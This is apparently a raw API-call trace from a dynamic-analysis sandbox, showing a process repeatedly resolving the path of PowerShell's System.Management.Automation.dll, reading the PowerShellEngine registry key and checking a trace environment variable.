	[0147.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.535] GetCurrentProcessId () returned 0x120
	[0147.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.541] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd718 | out: phkResult=0x1cd718*=0x3a0) returned 0x0
	[0147.541] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd69c, lpData=0x0, lpcbData=0x1cd698*=0x0 | out: lpType=0x1cd69c*=0x1, lpData=0x0, lpcbData=0x1cd698*=0x56) returned 0x0
	[0147.541] CoTaskMemAlloc (cb=0x5a) returned 0x1b835e10
	[0147.542] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd66c, lpData=0x1b835e10, lpcbData=0x1cd668*=0x56 | out: lpType=0x1cd66c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd668*=0x56) returned 0x0
	[0147.542] CoTaskMemFree (pv=0x1b835e10) 
	[0147.542] RegCloseKey (hKey=0x3a0) returned 0x0
	[0147.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.545] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0147.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.545] CoTaskMemFree (pv=0x23ecf0) 
	[0147.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
